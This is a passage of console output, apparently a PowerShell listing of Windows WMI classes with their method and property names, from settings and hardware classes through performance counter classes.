Setting}\nWin32_WMIElementSetting {} {Element, Setting}\nWin32_COMApplicationSettings {} {Element, Setting}\nWin32_VideoSettings {} {Element, Setting}\nWin32_SecuritySettingOfObject {} {Element, Setting}\nWin32_SecuritySettingOfLogicalShare {} {Element, Setting}\nWin32_SecuritySettingOfLogicalFile {} {Element, Setting}\nWin32_PageFileElementSetting {} {Element, Setting}\nWin32_OperatingSystemAutochkSetting {} {Element, Setting}\nWin32_VolumeQuotaSetting {} {Element, Setting}\nWin32_ProductSoftwareFeatures {} {Component, Product}\nWin32_ImplementedCategory {} {Category, Component}\nWin32_RoamingProfileUserConfigur... {} {DirectoriesToSyncAtLogonLogoff, ExcludedProfileDirs, IsConfiguredByWMI}\nWin32_InstalledSoftwareElement {} {Software, System}\nWin32_SoftwareFeatureCheck {} {Check, Element}\nWin32_LUIDandAttributes {} {Attributes, LUID}\nWin32_VolumeUserQuota {} {Account, DiskSpaceUsed, Limit, Status...}\nWin32_LUID {} {HighPart, LowPart}\nWin32_DirectorySpecification {Invoke} {Caption, CheckID, CheckMode, DefaultDir...}\nWin32_SoftwareElementCondition {Invoke} {Caption, CheckID, CheckMode, Condition...}\nWin32_ODBCDriverSpecification {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_ServiceSpecification {Invoke} {Caption, CheckID, CheckMode, Dependencies...}\nWin32_FileSpecification {Invoke} {Attributes, Caption, CheckID, CheckMode...}\nWin32_IniFileSpecification {Invoke} {Action, Caption, CheckID, CheckMode...}\nWin32_LaunchCondition {Invoke} {Caption, CheckID, CheckMode, Condition...}\nWin32_ODBCDataSourceSpecification {Invoke} {Caption, CheckID, CheckMode, DataSource...}\nWin32_ODBCTranslatorSpecification {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_ProgIDSpecification {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_EnvironmentSpecification {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_ReserveCost {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_Condition {Invoke} {Caption, CheckID, CheckMode, Condition...}\nWin32_ShadowStorage {Create} {AllocatedSpace, DiffVolume, MaxSpace, UsedSpace...}\nWin32_DCOMApplicationAccessAllow... {} {Element, Setting}\nWin32_FolderRedirection {} {ContentsMoved, ContentsMovedOnPolicyRemoval, ContentsRenamedInLocalCache, ExclusiveRightsGranted...}\nWin32_NamedJobObjectProcess {} {Collection, Member}\nWin32_TokenPrivileges {} {PrivilegeCount, Privileges}\nWin32_NamedJobObject {} {BasicUIRestrictions, Caption, CollectionID, Description}\nWin32_PnPDevice {} {SameElement, SystemElement}\nWin32_ServiceSpecificationService {} {Check, Element}\nWin32_ShareToDirectory {} {Share, SharedElement}\nWin32_SettingCheck {} {Check, Setting}\nWin32_PatchFile {} {Check, Setting}\nWin32_ODBCDriverAttribute {} {Check, Setting}\nWin32_ODBCDataSourceAttribute {} {Check, Setting}\nWin32_ClientApplicationSetting {} {Application, Client}\nWin32_RoamingUserHealthConfigura... {} {HealthStatusForTempProfiles, LastProfileDownloadIntervalCautionInHours, LastProfileDownloadIntervalUnhealthyInHours, LastProfileUploadInterva...\nWin32_UserStateConfigurationCont... {} {FolderRedirection, OfflineFiles, RoamingUserProfile}\nWin32_ServerFeature {} {ID, Name, ParentID}\nWin32_SecuritySettingOwner {} {Owner, SecuritySetting}\nWin32_LogicalFileOwner {} {Owner, SecuritySetting}\nWin32_PhysicalMedia {} {Capacity, Caption, CleanerMedia, CreationClassName...}\nWin32_PhysicalMemory {} {BankLabel, Capacity, Caption, CreationClassName...}\nWin32_OnBoardDevice {} {Caption, CreationClassName, Description, DeviceType...}\nWin32_BaseBoard {IsCompatible} {Caption, ConfigOptions, CreationClassName, Depth...}\nWin32_SystemEnclosure {IsCompatible} {AudibleAlarm, BreachDescription, CableManagementStrategy, Caption...}\nWin32_PhysicalMemoryArray {IsCompatible} {Caption, CreationClassName, Depth, Description...}\nWin32_SystemSlot {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...}\nWin32_PortConnector {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...}\nWin32_Thread {} {Caption, CreationClassName, CSCreationClassName, CSName...}\nWin32_COMApplication {} {Caption, Description, InstallDate, Name...}\nWin32_DCOMApplication {} {AppID, Caption, Description, InstallDate...}\nWin32_ScheduledJob {Create, Delete} {Caption, Command, DaysOfMonth, DaysOfWeek...}\nWin32_PrintJob {Pause, Resume} {Caption, Color, DataType, Description...}\nWin32_ServerSession {} {ActiveTime, Caption, ClientType, ComputerName...}\nWin32_ComputerSystem {SetPowerState, R... {AdminPasswordStatus, AutomaticManagedPagefile, AutomaticResetBootOption, AutomaticResetCapability...}\nWin32_NTDomain {} {Caption, ClientSiteName, CreationClassName, DcSiteName...}\nWin32_SoftwareFeature {Reinstall, Confi... {Accesses, Attributes, Caption, Description...}\nWin32_TemperatureProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nWin32_VoltageProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nWin32_CurrentProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nWin32_Bus {SetPowerState, R... {Availability, BusNum, BusType, Caption...}\nWin32_Keyboard {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_DesktopMonitor {SetPowerState, R... {Availability, Bandwidth, Caption, ConfigManagerErrorCode...}\nWin32_PointingDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_USBHub {SetPowerState, R... {Availability, Caption, ClassCode, ConfigManagerErrorCode...}\nWin32_NetworkAdapter {SetPowerState, R... {AdapterType, AdapterTypeId, AutoSense, Availability...}\nWin32_Battery {SetPowerState, R... {Availability, BatteryRechargeTime, BatteryStatus, Caption...}\nWin32_PortableBattery {SetPowerState, R... {Availability, BatteryStatus, CapacityMultiplier, Caption...}\nWin32_SoundDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_MotherboardDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_DiskDrive {SetPowerState, R... {Availability, BytesPerSector, Capabilities, CapabilityDescriptions...}\nWin32_FloppyDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_TapeDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_CDROMDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_PnPEntity {SetPowerState, R... {Availability, Caption, ClassGuid, CompatibleID...}\nWin32_POTSModem {SetPowerState, R... {AnswerMode, AttachedTo, Availability, BlindOff...}\nWin32_HeatPipe {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...}\nWin32_Refrigeration {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...}\nWin32_Fan {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...}\nWin32_Printer {SetPowerState, R... {Attributes, Availability, AvailableJobSheets, AveragePagesPerMinute...}\nWin32_SCSIController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_InfraredDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_PCMCIAController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_FloppyController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_VideoController {SetPowerState, R... {AcceleratorCapabilities, AdapterCompatibility, AdapterDACType, AdapterRAM...}\nWin32_USBController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_SerialPort {SetPowerState, R... {Availability, Binary, Capabilities, CapabilityDescriptions...}\nWin32_ParallelPort {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_IDEController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_1394Controller {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_CacheMemory {SetPowerState, R... {Access, AdditionalErrorData, Associativity, Availability...}\nWin32_Volume {SetPowerState, R... {Access, Automount, Availability, BlockSize...}\nWin32_SMBIOSMemory {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...}\nWin32_MemoryArray {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...}\nWin32_MemoryDevice {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...}\nWin32_LogicalDisk {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nWin32_MappedLogicalDisk {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nWin32_DiskPartition {SetPowerState, R... {Access, Availability, BlockSize, Bootable...}\nWin32_Processor {SetPowerState, R... {AddressWidth, Architecture, Availability, Caption...}\nWin32_OptionalFeature {} {Caption, Description, InstallDate, InstallState...}\nWin32_DfsNode {Create} {Caption, Description, InstallDate, Name...}\nWin32_ComponentCategory {} {Caption, CategoryId, Description, InstallDate...}\nWin32_ProgramGroupOrItem {} {Caption, Description, InstallDate, Name...}\nWin32_LogicalProgramGroupItem {} {Caption, Description, InstallDate, Name...}\nWin32_LogicalProgramGroup {} {Caption, Description, GroupName, InstallDate...}\nWin32_NetworkConnection {} {AccessMask, Caption, Comment, ConnectionState...}\nWin32_COMClass {} {Caption, Description, InstallDate, Name...}\nWin32_ClassicCOMClass {} {Caption, ComponentId, Description, InstallDate...}\nWin32_Account {} {Caption, Description, Domain, InstallDate...}\nWin32_UserAccount {Rename} {AccountType, Caption, Description, Disabled...}\nWin32_Group {Rename} {Caption, Description, Domain, InstallDate...}\nWin32_SystemAccount {} {Caption, Description, Domain, InstallDate...}\nWin32_BaseService {StartService, St... {AcceptPause, AcceptStop, Caption, CreationClassName...}\nWin32_SystemDriver {StartService, St... {AcceptPause, AcceptStop, Caption, CreationClassName...}\nWin32_Service {StartService, St... {AcceptPause, AcceptStop, Caption, CheckPoint...}\nWin32_TerminalService {StartService, St... {AcceptPause, AcceptStop, Caption, CheckPoint...}\nWin32_PnPSignedDriver {StartService, St... {Caption, ClassGuid, CompatID, CreationClassName...}\nWin32_ApplicationService {StartService, St... {Caption, CreationClassName, Description, InstallDate...}\nWin32_PrinterDriver {StartService, St... {Caption, ConfigFile, CreationClassName, DataFile...}\nWin32_TCPIPPrinterPort {} {ByteCount, Caption, CreationClassName, Description...}\nWin32_CommandLineAccess {} {Caption, CommandLine, CreationClassName, Description...}\nWin32_SystemMemoryResource {} {Caption, CreationClassName, CSCreationClassName, CSName...}\nWin32_PortResource {} {Alias, Caption, CreationClassName, CSCreationClassName...}\nWin32_DeviceMemoryAddress {} {Caption, CreationClassName, CSCreationClassName, CSName...}\nWin32_IRQResource {} {Availability, Caption, CreationClassName, CSCreationClassName...}\nWin32_Environment {} {Caption, Description, InstallDate, Name...}\nWin32_DMAChannel {} {AddressSize, Availability, BurstMode, ByteMode...}\nWin32_Share {Create, SetShare... {AccessMask, AllowMaximum, Caption, Description...}\nWin32_ClusterShare {Create, SetShare... {AccessMask, AllowMaximum, Caption, Description...}\nWin32_NetworkProtocol {} {Caption, ConnectionlessService, Description, GuaranteesDelivery...}\nWin32_ShadowProvider {} {Caption, CLSID, Description, ID...}\nWin32_QuickFixEngineering {} {Caption, CSName, Description, FixComments...}\nWin32_IP4RouteTable {} {Age, Caption, Description, Destination...}\nWin32_ShadowCopy {Create, Revert} {Caption, ClientAccessible, Count, Description...}\nWin32_LoadOrderGroup {} {Caption, Description, DriverEnabled, GroupOrder...}\nWin32_Process {Create, Terminat... {Caption, CommandLine, CreationClassName, CreationDate...}\nWin32_Session {} {Caption, Description, InstallDate, Name...}\nWin32_LogonSession {} {AuthenticationPackage, Caption, Description, InstallDate...}\nWin32_ServerConnection {} {ActiveTime, Caption, ComputerName, ConnectionID...}\nWin32_DfsTarget {} {Caption, Description, InstallDate, LinkName...}\nWin32_NetworkClient {} {Caption, Description, InstallDate, Manufacturer...}\nWin32_PageFileUsage {} {AllocatedBaseSize, Caption, CurrentUsage, Description...}\nWin32_OperatingSystem {Reboot, Shutdown... {BootDevice, BuildNumber, BuildType, Caption...}\nWin32_Directory {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_ShortcutFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_CodecFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_NTEventlogFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_PageFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_IP4PersistedRouteTable {} {Caption, Description, Destination, InstallDate...}\nWin32_Registry {} {Caption, CurrentSize, Description, InstallDate...}\nWin32_BIOS {} {BiosCharacteristics, BIOSVersion, BuildNumber, Caption...}\nWin32_SoftwareElement {} {Attributes, BuildNumber, Caption, CodeSet...}\nWin32_ShortcutSAP {} {Action, Element}\nWin32_MethodParameterClass {} {}\nWin32_ProcessStartup {} {CreateFlags, EnvironmentVariables, ErrorMode, FillAttribute...}\nWin32_PingStatus {} {Address, BufferSize, NoFragmentation, PrimaryAddressResolutionStatus...}\nWin32_SoftwareElementCheck {} {Check, Element, Phase}\nWin32_ODBCDriverSoftwareElement {} {Check, Element, Phase}\nWin32_SystemServices {} {GroupComponent, PartComponent}\nWin32_SystemNetworkConnections {} {GroupComponent, PartComponent}\nWin32_SystemResources {} {GroupComponent, PartComponent}\nWin32_SystemBIOS {} {GroupComponent, PartComponent}\nWin32_SystemLoadOrderGroups {} {GroupComponent, PartComponent}\nWin32_SystemUsers {} {GroupComponent, PartComponent}\nWin32_SystemOperatingSystem {} {GroupComponent, PartComponent, PrimaryOS}\nWin32_SystemDevices {} {GroupComponent, PartComponent}\nWin32_ComputerSystemProcessor {} {GroupComponent, PartComponent}\nWin32_SystemPartitions {} {GroupComponent, PartComponent}\nWin32_SystemSystemDriver {} {GroupComponent, PartComponent}\nWin32_SystemProcesses {} {GroupComponent, PartComponent}\nWin32_COMApplicationClasses {} {GroupComponent, PartComponent}\nWin32_ClassicCOMApplicationClasses {} {GroupComponent, PartComponent}\nWin32_UserInDomain {} {GroupComponent, PartComponent}\nWin32_LoadOrderGroupServiceMembers {} {GroupComponent, PartComponent}\nWin32_LogicalDiskRootDirectory {} {GroupComponent, PartComponent}\nWin32_SoftwareFeatureSoftwareEle... {} {GroupComponent, PartComponent}\nWin32_MemoryDeviceArray {} {GroupComponent, PartComponent}\nWin32_GroupInDomain {} {GroupComponent, PartComponent}\nWin32_GroupUser {} {GroupComponent, PartComponent}\nWin32_ProgramGroupContents {} {GroupComponent, PartComponent}\nWin32_SubDirectory {} {GroupComponent, PartComponent}\nWin32_PhysicalMemoryLocation {} {GroupComponent, LocationWithinContainer, PartComponent}\nWin32_FolderRedirectionUserConfi... {} {AppDataRoaming, Contacts, Desktop, Documents...}\nWin32_Reliability {} {}\nWin32_ReliabilityStabilityMetrics {GetRecordCount} {EndMeasurementDate, RelID, StartMeasurementDate, SystemStabilityIndex...}\nWin32_ReliabilityRecords {GetRecordCount} {ComputerName, EventIdentifier, InsertionStrings, Logfile...}\nWin32_NTLogEventLog {} {Log, Record}\nWin32_DiskQuota {} {DiskSpaceUsed, Limit, QuotaVolume, Status...}\nWin32_ComClassAutoEmulator {} {NewVersion, OldVersion}\nWin32_FolderRedirectionHealthCon... {} {LastSyncDurationCautionInHours, LastSyncDurationUnhealthyInHours}\nWin32_ComClassEmulator {} {NewVersion, OldVersion}\nWin32_SoftwareFeatureAction {} {Action, Element}\nWin32_NamedJobObjectActgInfo {} {ActiveProcesses, Caption, Description, Name...}\nWin32_Perf {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_SecuritySettingGroup {} {Group, SecuritySetting}\nWin32_LogicalFileGroup {} {Group, SecuritySetting}\nWin32_DCOMApplicationLaunchAllow... {} {Element, Setting}\nWin32_SecuritySettingAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_LogicalFileAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_LogicalShareAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_SoftwareElementAction {} {Action, Element}\nWin32_ApplicationCommandLine {} {Antecedent, Dependent}\nWin32_SubSession {} {Antecedent, Dependent}\nWin32_ShadowVolumeSupport {} {Antecedent, Dependent}\nWin32_DeviceBus {} {Antecedent, Dependent}\nWin32_SessionConnection {} {Antecedent, Dependent}\nWin32_ShadowFor {} {Antecedent, Dependent}\nWin32_LogonSessionMappedDisk {} {Antecedent, Dependent}\nWin32_PrinterShare {} {Antecedent, Dependent}\nWin32_PnPSignedDriverCIMDataFile {} {Antecedent, Dependent}\nWin32_ConnectionShare {} {Antecedent, Dependent}\nWin32_LoadOrderGroupServiceDepen... {} {Antecedent, Dependent}\nWin32_SessionResource {} {Antecedent, Dependent}\nWin32_SessionProcess {} {Antecedent, Dependent}\nWin32_AssociatedProcessorMemory {} {Antecedent, BusSpeed, Dependent}\nWin32_SoftwareFeatureParent {} {Antecedent, Dependent}\nWin32_ShadowOn {} {Antecedent, Dependent}\nWin32_PrinterDriverDll {} {Antecedent, Dependent}\nWin32_DependentService {} {Antecedent, Dependent, TypeOfDependency}\nWin32_LogicalDiskToPartition {} {Antecedent, Dependent, EndingAddress, StartingAddress}\nWin32_OperatingSystemQFE {} {Antecedent, Dependent}\nWin32_LoggedOnUser {} {Antecedent, Dependent}\nWin32_SystemDriverPNPEntity {} {Antecedent, Dependent}\nWin32_DfsNodeTarget {} {Antecedent, Dependent}\nWin32_CIMLogicalDeviceCIMDataFile {} {Antecedent, Dependent, Purpose, PurposeDescription}\nWin32_SCSIControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_POTSModemToSerialPort {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_USBControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_PrinterController {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_IDEControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_ControllerHasHub {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_1394ControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_DriverForDevice {} {Antecedent, Dependent}\nWin32_LogicalProgramGroupItemDat... {} {Antecedent, Dependent}\nWin32_PNPAllocatedResource {} {Antecedent, Dependent}\nWin32_DiskDrivePhysicalMedia {} {Antecedent, Dependent}\nWin32_MemoryDeviceLocation {} {Antecedent, Dependent}\nWin32_MemoryArrayLocation {} {Antecedent, Dependent}\nWin32_ShadowBy {} {Antecedent, Dependent}\nWin32_AllocatedResource {} {Antecedent, Dependent}\nWin32_DiskDriveToDiskPartition {} {Antecedent, Dependent}\nWin32_LogicalProgramGroupDirectory {} {Antecedent, Dependent}\nWin32_ShadowDiffVolumeSupport {} {Antecedent, Dependent}\nWin32_Product {Install, Admin, ... {AssignmentType, Caption, Description, HelpLink...}\nWin32_ComputerSystemProduct {} {Caption, Description, IdentifyingNumber, Name...}\nWin32_ProductCheck {} {Check, Product}\nWin32_NTLogEventUser {} {Record, User}\nWin32_ProtocolBinding {} {Antecedent, Dependent, Device}\nWin32_NamedJobObjectLimit {} {Collection, Setting}\nWin32_NamedJobObjectSecLimit {} {Collection, Setting}\nWin32_NTLogEventComputer {} {Computer, Record}\nWin32_TokenGroups {} {GroupCount, Groups}\nWin32_DefragAnalysis {} {AverageFileSize, AverageFragmentsPerFile, AverageFreeSpacePerExtent, ClusterSize...}\nWin32_SIDandAttributes {} {Attributes, SID}\nWin32_CheckCheck {} {Check, Location}\nWin32_RoamingProfileBackgroundUp... {} {Interval, SchedulingMethod, Time}\nWin32_RoamingProfileSlowLinkParams {} {ConnectionTransferRate, TimeOut}\nWin32_SecuritySettingAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_LogicalFileAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_LogicalShareAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_OfflineFilesHealth {} {LastSuccessfulSyncTime, LastSyncStatus, LastSyncTime, OfflineAccessEnabled...}\nWin32_PerfFormattedData_ADWS_ADWS {} {ActiveWebServiceSessions, AllocatedConnections, Caption, ChangeOptionalFeatureOperationsPerSecond...}\nWin32_PerfRawData_ADWS_ADWS {} {ActiveWebServiceSessions, AllocatedConnections, Caption, ChangeOptionalFeatureOperationsPerSecond...}\nWin32_PerfFormattedData_AFDCount... {} {Caption, Description, DroppedDatagrams, DroppedDatagramsPersec...}\nWin32_PerfRawData_AFDCounters_Mi... {} {Caption, Description, DroppedDatagrams, DroppedDatagramsPersec...}\nWin32_PerfFormattedData_Authoriz... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_AuthorizationM... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_BITS_BIT... {} {BITSDownloadBlockSizeBytes, BITSDownloadResponseIntervalmsec, Caption, Description...}\nWin32_PerfRawData_BITS_BITSNetUt... {} {BITSDownloadBlockSizeBytes, BITSDownloadResponseIntervalmsec, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {AAAAqueriesFailed, AAAAqueriesSuccessful, AAAASynthesizedrecords, Caption...}\nWin32_PerfRawData_Counters_DNS64... {} {AAAAqueriesFailed, AAAAqueriesSuccessful, AAAASynthesizedrecords, Caption...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Event... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {BufferMemoryUsageNonPagedPool, BufferMemoryUsagePagedPool, Caption, Description...}\nWin32_PerfRawData_Counters_Event... {} {BufferMemoryUsageNonPagedPool, BufferMemoryUsagePagedPool, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, FileSystemBytesRead, FileSystemBytesWritten...}\nWin32_PerfRawData_Counters_FileS... {} {Caption, Description, FileSystemBytesRead, FileSystemBytesWritten...}\nWin32_PerfFormattedData_Counters... {} {AuthIPMainModeNegotiationTime, AuthIPQuickModeNegotiationTime, Caption, Description...}\nWin32_PerfRawData_Counters_Gener... {} {AuthIPMainModeNegotiationTime, AuthIPQuickModeNegotiationTime, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {Caption, CurrentUrisCached, Description, Frequency_Object...}\nWin32_PerfRawData_Counters_HTTPS... {} {Caption, CurrentUrisCached, Description, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {ArrivalRate, CacheHitRate, Caption, CurrentQueueSize...}\nWin32_PerfRawData_Counters_HTTPS... {} {ArrivalRate, CacheHitRate, Caption, CurrentQueueSize...}\nWin32_PerfFormattedData_Counters... {} {AllRequests, BytesReceivedRate, BytesSentRate, BytesTransferredRate...}\nWin32_PerfRawData_Counters_HTTPS... {} {AllRequests, BytesReceivedRate, BytesSentRate, BytesTransferredRate...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Hyper... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, DropsNeighborresolutiontimeouts, ErrorsAuthenticationErrors...}\nWin32_PerfRawData_Counters_IPHTT... {} {Caption, Description, DropsNeighborresolutiontimeouts, ErrorsAuthenticationErrors...}\nWin32_PerfFormattedData_Counters... {} {Bytesreceivedonthissession, Bytessentonthissession, Caption, Description...}\nWin32_PerfRawData_Counters_IPHTT... {} {Bytesreceivedonthissession, Bytessentonthissession, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...}\nWin32_PerfFormattedData_Counters... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_IPsec... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, CurrentStateEntries, Description, Frequency_Object...}\nWin32_PerfRawData_Counters_IPsec... {} {Caption, CurrentStateEntries, Description, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {ActiveSecurityAssociations, BytesReceivedinTransportModePersec, BytesReceivedinTunnelModePersec, BytesSentinTransportModePersec...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveSecurityAssociations, BytesReceivedinTransportModePersec, BytesReceivedinTunnelModePersec, BytesSentinTransportModePersec...}\nWin32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, FailedRequests, Frequency_Object...}\nWin32_PerfRawData_Counters_KPSSVC {} {Caption, Description, FailedRequests, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {AverageSemaphoreHoldTime, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_Counters_Netlogon {} {AverageSemaphoreHoldTime, AverageSemaphoreHoldTime_Base, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {Bytestransmitted, BytestransmittedPersec, Caption, Description...}\nWin32_PerfRawData_Counters_Netwo... {} {Bytestransmitted, BytestransmittedPersec, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Bytesscheduled...}\nWin32_PerfRawData_Counters_Pacer... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Bytesscheduled...}\nWin32_PerfFormattedData_Counters... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Caption...}\nWin32_PerfRawData_Counters_Pacer... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Caption...}\nWin32_PerfFormattedData_Counters... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...}\nWin32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, DevicePowerState, Frequency_Object...}\nWin32_PerfRawData_Counters_Physi... {} {Caption, Description, DevicePowerState, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {ActivityHostManagerhostprocessespoolsize, ActivityHostManagerNumberofbusyhostprocesses, ActivityHostManagerNumberofcreatedhostprocesses, Acti...\nWin32_PerfRawData_Counters_Power... {} {ActivityHostManagerhostprocessespoolsize, ActivityHostManagerNumberofbusyhostprocesses, ActivityHostManagerNumberofcreatedhostprocesses, Acti...\nWin32_PerfFormattedData_Counters... {} {AverageIdleTime, C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec...}\nWin32_PerfRawData_Counters_Proce... {} {AverageIdleTime, AverageIdleTime_Base, C1TransitionsPersec, C2TransitionsPersec...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_RDMAA... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {AverageEncodingTime, Caption, Description, FrameQuality...}\nWin32_PerfRawData_Counters_Remot... {} {AverageEncodingTime, Caption, Description, FrameQuality...}\nWin32_PerfFormattedData_Counters... {} {BaseTCPRTT, BaseUDPRTT, Caption, CurrentTCPBandwidth...}\nWin32_PerfRawData_Counters_Remot... {} {BaseTCPRTT, BaseUDPRTT, Caption, CurrentTCPBandwidth...}\nWin32_PerfFormattedData_Counters... {} 